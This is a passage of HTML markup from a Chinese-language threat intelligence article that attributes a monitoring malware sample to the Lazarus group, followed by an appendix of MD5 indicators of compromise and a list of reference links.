[&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf=""> 三、归属研判 </span></span></strong></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">根据目前分析结果来看，我们发现了该类监控程序的测试版本。该监控程序整体完善，并且使用了Vault 7泄露中提及的持久化技术，背后可能由大型组织提供支撑。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">在深入分析后，我们还捕获到了攻击者测试的恶意文档（“f:\print\가계표 - copy.docx”），并且攻击者相关IP地址显示东北亚地区，</span><span leaf="">于是这让我们把目光投向了该地区。随着进一步追踪，我们发现攻击者会使用Astrill软件。同时，我们也发现攻击者使用的部分开发工具，包括web3相关的程序(例如web3-wallet-connect-app-flutter)。</span></span></p><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">据微软披露的该组织相关成员的活动规律[5]，其成员通常以东北亚地区为据点，通过VPN和远程管理工具实施隐蔽行动。</span></span></p><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">综合以上信息，这非常符合</span><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;,&#34;data-pm-slice&#34;:&#34;4 2 [\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;data-role\&#34;:\&#34;outer\&#34;,\&#34;label\&#34;:\&#34;edit by 135editor\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;}]&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">Lazarus组织</span></span><span leaf="">所表现出来的技战术，因此我们将此次监控软件归属到</span><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;,&#34;data-pm-slice&#34;:&#34;4 2 [\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;data-role\&#34;:\&#34;outer\&#34;,\&#34;label\&#34;:\&#34;edit by 135editor\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;}]&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">Lazarus组织，同时</span></span><span leaf="">我们也以</span><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;,&#34;data-pm-slice&#34;:&#34;4 2 [\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;data-role\&#34;:\&#34;outer\&#34;,\&#34;label\&#34;:\&#34;edit by 135editor\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;}]&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px; text-indent: 2em; line-height: 1.6em; margin-bottom: 24px; margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px; text-indent: 37.3333px; font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">Lazarus</span></span><span leaf="">组织来持续跟踪他们。</span></span></p><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">目前，该监控软件的具体用途尚不明确，但结合Lazarus组织的历史攻击模式，我们推测其可能被用于渗透合法企业或组织后，长期窃取敏感信息、源代码、内部通信数据，或进一步针对加密货币资产发起定向攻击。</span></span></p><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">后续我们将持续关注该组织及其工具链的演进，尤其聚焦其在 Web3、区块链平台及加密货币生态中的潜在渗透与攻击动向，及时预警相关风险。</span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer"><div data-role="paragraph" data-pm-slice="3 6 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="edit by 135editor"><div data-role="title" data-tools="135编辑器" data-id="85638"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);font-family: inherit;"><p style="margin-top: -1.2em;text-align: center;border-width: initial;border-style: none;border-color: initial;line-height: 1.4;"><span style="font-size: 16px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 16px;background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 23px;text-decoration: inherit;"><span leaf="">附录 IOC</span></span></strong></span></p></div></div><div data-role="paragraph" style="margin-top: 24px;margin-bottom: 24px;"><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">MD5</span></span></strong></span></p><p data-pm-slice="0 0 []" style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span lang="EN-US"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">62565204478f0ef679aafd7c2f5ceae5</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span lang="EN-US"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">462d434aabc3954076480ff61f299f05</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span lang="EN-US"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">a52210763540abeda00f6923f02f7e33</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span lang="EN-US"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">f3fcff392f44a3b7f0c49b7205c253ea</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span lang="EN-US"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">8ad4d981594e40620dc179b39312de91</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span lang="EN-US"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">0c54b86bc8ce4017fe2375f77d004020</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span lang="EN-US"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">87cb1482285329e744c16481738e1579</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span lang="EN-US"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">3214097b251625b5b6bb1dd8cf535248</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span lang="EN-US"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">e3bd8d4a7eda1cafcbc3c898d86ccb0c</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span lang="EN-US"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">54ef01d1074f91e1959a8269743d869e</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span lang="EN-US"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">c9a71a3443156591131faff7b980e475</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span lang="EN-US"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">6ceaedac54a5763829dc193927ccecd8</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span lang="EN-US"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">b13906367428aaf869ac74054116d1f3</span></span></p></div></div></div></div></div></div></div><div data-role="outer" label="edit by 135editor"><div data-role="paragraph"><div data-role="outer" label="edit by 135editor"><div data-role="paragraph" style="margin-top: 24px;margin-bottom: 24px;" data-pm-slice="6 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="edit by 135editor"><div data-role="title" data-tools="135编辑器" data-id="85638"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);font-family: inherit;"><p style="margin-top: -1.2em;text-align: center;border-width: initial;border-style: none;border-color: initial;line-height: 1.4;"><span style="font-size: 16px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 16px;background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 23px;text-decoration: inherit;"><span leaf="">参考</span></span></strong></span></p></div></div></div><p><span style="font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;text-indent: -21pt;letter-spacing: 0.034em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">[1]</span><span leaf=""><a href="https://wikileaks.org/ciav7p1/cms/page_2621765.html" target="_blank">https://wikileaks.org/ciav7p1/cms/page_2621765.html</a></span></span></p><p><span style="font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;text-indent: -21pt;letter-spacing: 0.034em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">[2]</span><span leaf=""><a href="http://xcoolcat7.tistory.com/91421" target="_blank">http://xcoolcat7.tistory.com/91421</a></span></span></p><p><span style="font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;text-indent: -21pt;letter-spacing: 0.034em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">[3]</span><span leaf=""><a href="https://storage.googleapis.com/spur-astrill-vpn/ips.txt" target="_blank">https://storage.googleapis.com/spur-astrill-vpn/ips.txt</a></span></span></p><p><span style="font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;text-indent: -21pt;letter-spacing: 0.034em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">[4]</span><span leaf=""><a href="https://spur.us/astrill-vpn-and-remote-worker-fraud/" target="_blank">https://spur.us/astrill-vpn-and-remote-worker-fraud/</a></span></span></p><p><span style="font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;text-indent: -21pt;letter-spacing: 0.034em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">[5]</span><span leaf=""><a href="https://www.microsoft.com/en-us/security/blog/2025/06/30/jasper-sleet-north-korean-remote-it-workers-evolving-tactics-to-infiltrate-organizations/" target="_blank">https://www.microsoft.com/en-us/security/blog/2025/06/30/jasper-sleet-north-korean-remote-it-workers-evolving-tactics-to-infiltrate-organizations/</a></span></span></p></div></div></div></div><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="6 7 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-tools="135编辑器" data-id="98507" style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><div style="margin: 10px auto;text-align: center;line-height: 1.5em;"><div style="padding-bottom: 3px;display: flex;justify-content: center;align-items: center;border-bottom: 1px solid rgb(190, 25, 31);"><p data-brushtype="text" style="padding-right: 8px;padding-left: 8px;font-size: 16px;letter-spacing: 1.5px;transform: rotate(0deg);"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino 